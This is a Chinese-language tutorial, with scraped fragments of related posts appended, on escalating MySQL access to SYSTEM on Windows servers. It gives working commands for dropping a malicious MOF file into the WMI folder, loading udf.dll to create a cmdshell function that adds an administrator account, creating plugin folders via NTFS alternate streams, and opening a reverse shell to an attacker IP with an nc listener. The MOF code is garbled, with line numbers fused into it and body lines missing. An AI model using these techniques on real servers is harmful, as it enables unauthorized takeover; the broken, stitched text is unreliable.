windows管理規範提供了以下三種方法編譯到wmi儲存庫的託管物件格式(mof)檔案:
1、執行mof檔案指定為命令列引數講mofcomp.exe檔案。
2、使用imofcompiler介面和$compilefile方法。
3、拖放到%systemroot%\system32\wbem\mof資料夾的mof檔案。
micrsoft建議您到儲存庫編譯mof檔案使用前兩種方法。也就是執行mofcomp.exe檔案或使用imofcompiler:compilefile方法。
第三種方法僅為後相容性與早期版本的wmi提供,並因為此功能可能不會提供在將來的版本。
具體到mysql提權中,我們該怎麼利用?
1、找乙個可寫目錄上傳mof檔案,這裡我們上傳到了c:/wmpub/nullevt.mof,**如下:
其中第18行,上傳前請自己更改。
1#pragma namespace("\\\\.\\root\\subscription")
23 instance of __eventfilter as
$eventfilter4;
1213 instance of activescripteventconsumer as
$consumer14;
2021
instance of __filtertoconsumerbinding
22;
2、執行load_file及into dumpfile把檔案匯出到正確的位置即可。
1select load_file('
c:/wmpub/nullevt.mof
') into dumpfile '
c:/windows/system32/wbem/mof/nullevt.mof'
執行成功後,即可新增乙個普通使用者,然後可以更改命令,再上傳導出執行把使用者提公升到管理員許可權,然後3389連線就可以了。
功能:利用mysql自定義函式功能,將mysql的賬號轉化為system許可權。
適用場景:1、目標系統是windows(win2000, xp,win2003);2、擁有mysql的某個使用者賬號,此賬號必須有對mysql的insert和delete許可權和拋棄函式。
3、首先判斷mysql版本,如果大於5.1的話,就直接上傳udf.dll到mysql\lib\plugin\資料夾下,一般lib、plugin資料夾需要手工建立,mysql路徑可以用select @@datadir語句找出。
4、直接執行create function sys_eval returns string soname 'udf.dll',若成功則可直接執行命令。
udf提權也是最常見的提權方式。但是往往再執行過程中老是遇到"can't open shared library"的情況,這裡可以利用ntfs ads流來解決這個問題。
1、最常見的是直接使用udf.php此類的工具來執行udf提權。
連線mysql以後,先導出udf.dll到c:\windows\system32目錄下。
2、建立相應的函式並執行命令,具體如下:
1create
function cmdshell returns string soname '
udf.dll';
2select cmdshell('
net user waitalone waitalone.cn /add');
3select cmdshell('
net localgroup administrators waitalone /add');
4drop
function
cmdshell; 刪除函式
5delete
from mysql.func where name=
'cmdshell
' 刪除函式
3、某些情況下,我們會遇到can't open shared library的情況,這時就需要我們把udf.dll匯出到lib\plugin目錄下才可以,但是默默情況下
plugin不存在,怎麼辦?還好有大牛研究出利用ntfs ads流來建立資料夾的方法:
select@@basedir
;
//查詢到mysql的目錄
select
'it is dll
'into dumpfile '
c:\\program files\\mysql\\mysql server 5.1\\lib::$index_allocation
';
//利用ntfs ads建立lib目錄
select
'it is dll
'into dumpfile '
c:\\program files\\mysql\\mysql server 5.1\\lib\\plugin::$index_allocation';
//利用ntfs ads建立plugin目錄
執行成功以後再進行匯出即可。
假設我們掃到乙個mysql的root弱密碼,並且可以外連,但是伺服器上面的**又無法getshell,這時我們怎麼辦?
1、利用mysql客戶端工具連線mysql伺服器,然後執行下面的操作。(mysql.txt暫時沒有)
mysql.exe -h 172.16.10.11 -uroot -penter password:
mysql> \. c:\mysql.txt
mysql>select backshell("yourip",2010);
2、本地監聽你**的埠
nc.exe -vv -l -p 2010
成功後,你將獲得乙個system許可權的cmdshell,其實這個也是利用ufdf提權。
mysql提權原始碼 mysql提權
namp 掃瞄ip埠 cms 探測 wpscan kali 工具 wpscan 掃瞄出來使用者名稱。用使用者名稱登入ssh 然後利用mysql udf提權。2.gcc g shared wl,soname,raptor udf.so o raptor udf.so raptor udf.o lc 3...
mysql 提權 通過Mysql提權的幾種姿勢
本文記錄利用mysql資料庫,在拿到shell之後進行提權的兩種方法。一 udf提權 基本步驟 1 匯出udf.dll檔案到指定目錄 有些webshell整合,直接導 出即可,沒有,則需要上傳 2 基於udf.dll建立自定義函式cmdshell 3 利用自定義函式,執行高許可權cmd命令 以下按照...
提權總結 自用
systeminfo 檢視配置 感覺和phpinfo作用差不多,但是不用加括號 findstr 接目錄檔案,systeminfo被ban用 hostname 看主機名,可能主機名是伺服器所搭載的服務名稱 set 檢視環境變數 若為有讀寫許可權的盤,可以更換環境變數的檔案 再通過cmd呼叫 net u...